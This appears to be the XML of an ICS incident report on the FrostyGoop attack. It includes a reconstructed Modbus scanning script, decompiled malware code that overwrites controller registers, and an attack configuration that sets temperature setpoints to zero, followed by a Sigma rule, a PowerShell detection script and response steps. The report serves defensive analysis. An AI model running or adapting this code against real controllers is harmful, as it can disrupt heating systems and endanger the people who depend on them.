    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000160">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Reconstructed reconnaissance script based on forensic analysis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Source: Dragos IR Report DR-2024-UKR-001 [[61]](#ref61)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import socket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import struct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def modbus_scan(ip_range):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for ip in ip_range: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 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)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s.settimeout(2)</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try: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s.connect((ip, 502))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Modbus function code 0x11 - Report Server ID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query = struct.pack('&gt;HHHBB', 0x0001, 0x0000, 0x0006, 0x01, 0x11)</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s.send(query)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response = s.recv(1024)</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if response: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print(f"Modbus device found: {ip}")</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parse_device_info(response)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except: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pass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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mr6k2pa7rten" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: FrostyGoop Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000188">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0821 - Modify Controller Tasking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89">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3vewbc7932ei" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware Capabilities Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Decompiled FrostyGoop main function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SHA256: 7c51d9a53e4d0c138831923e60a2a997df209e946228a0e12169b0243c0746aa [[63]](#ref63)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func main()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config := loadConfig("config.json")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for _, target := range config.Targets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client := modbus.NewClient(target.IP, target.Port)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Function Code 3: Read Holding Registers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data, _ := client.ReadHoldingRegisters(target.StartAddr, target.Count)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log.Printf("Current values: %v", data)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Function Code 16: Write Multiple Registers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newValues := make([]uint16, len(target.NewValues))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for i, v := range target.NewValues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newValues[i] = uint16(v)</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err := client.WriteMultipleRegisters(target.StartAddr, newValues)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if err == nil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log.Printf("Successfully modified %s", target.IP)</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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vgl9sm1dwa9v" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: Process Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0855 - Unauthorized Command Message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B9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rf9jaaa5fap6" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Configuration File</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"targets":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"ip": "10.1.1.50",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"port": 502,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"device": "ENCO_CONTROLLER_01",</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"start_addr": 40001,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"count": 10,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"new_values": [0, 0, 0, 0, 0, 0, 0, 0, 0, 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"description": "Set all temperature setpoints to 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"execution_time": "2024-01-22T03:47:00Z"</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95efr0bgag0g" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m2v0tw7hkwit" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive TTP Matrix</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T1133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Exploit exposed router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Firewall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hyperlink w:anchor="ref65">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[65]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T1505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Web shell on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File system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hyperlink w:anchor="ref66">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[66]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T0846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Modbus device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Network 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hyperlink w:anchor="ref67">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[67]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Read control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ICS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hyperlink w:anchor="ref68">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[68]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T1571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Non-standard port (502)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Port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hyperlink w:anchor="ref69">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[69]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Manipulation of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Process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hyperlink w:anchor="ref70">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[70]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000203">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uhj5mqkvjqg6" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ICS-Specific Techniques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Impair Process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T0855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Temperature setpoints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Loss of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hyperlink w:anchor="ref71">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Inhibit Response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T0816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Alarm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Delayed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hyperlink w:anchor="ref72">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[72]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u2or596hks19" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000216">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_494ojofb5to8" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000217">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_duijnaevg844" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sigma Rule: FrostyGoop Modbus Manipulation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Reference: [[73]](#ref73)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title: Suspicious Modbus Multiple Register Writes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id: 8a7f3c4e-9b5d-4e2a-b3f7-d1c8e5a9f2b1</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status: experimental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description: Detects unusual Modbus write operations characteristic of FrostyGoop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logsource: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product: zeek</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service: modbus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detection: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selection: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function_code: 16  # Write Multiple Registers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quantity: '&gt;10'</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timeframe: 5m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condition: selection | count() by src_ip &gt; 20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level: high</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hxx4spyzxm2z" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Host-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000238">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># PowerShell detection for FrostyGoop artifacts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Deploy to OT Windows systems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$suspiciousFiles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"C:\Windows\Temp\modbus*.exe",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"C:\ProgramData\*config.json",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"C:\Users\*\AppData\Local\Temp\fg*.tmp"</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foreach ($pattern in $suspiciousFiles)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$files = Get-ChildItem -Path $pattern -ErrorAction SilentlyContinue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if ($files)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foreach ($file in $files)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$hash = (Get-FileHash $file.FullName -Algorithm SHA256).Hash</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Write-EventLog -LogName Security -EventId 4001 -Message "Suspicious file detected: $($file.FullName) SHA256: $hash"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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p96pi4i74gs5" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000258">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_clzgj93einy2" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-4 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000259">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate Modbus networks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from internet-connected systems </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref74">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[74]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement emergency manual control</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> procedures </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref75">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[75]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy OT-specific incident response</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> team </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref76">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[76]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document all register values</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before making changes </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref77">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[77]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5g0ffpxg5pxh" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-term Actions (4-24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit all internet-exposed ICS devices</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref78">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[78]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Change default credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on all network devices </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref79">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[79]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000260">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement Modbus authentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where supported </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref80">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[80]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000261">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_68iiga2gr8wk" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-term Actions (1-30 days)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy unidirectional security gateways</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref81">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[81]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000263">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement ICS-specific monitoring</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref82">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[82]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000264">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Develop manual operation playbooks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref83">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[83]</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pPr>
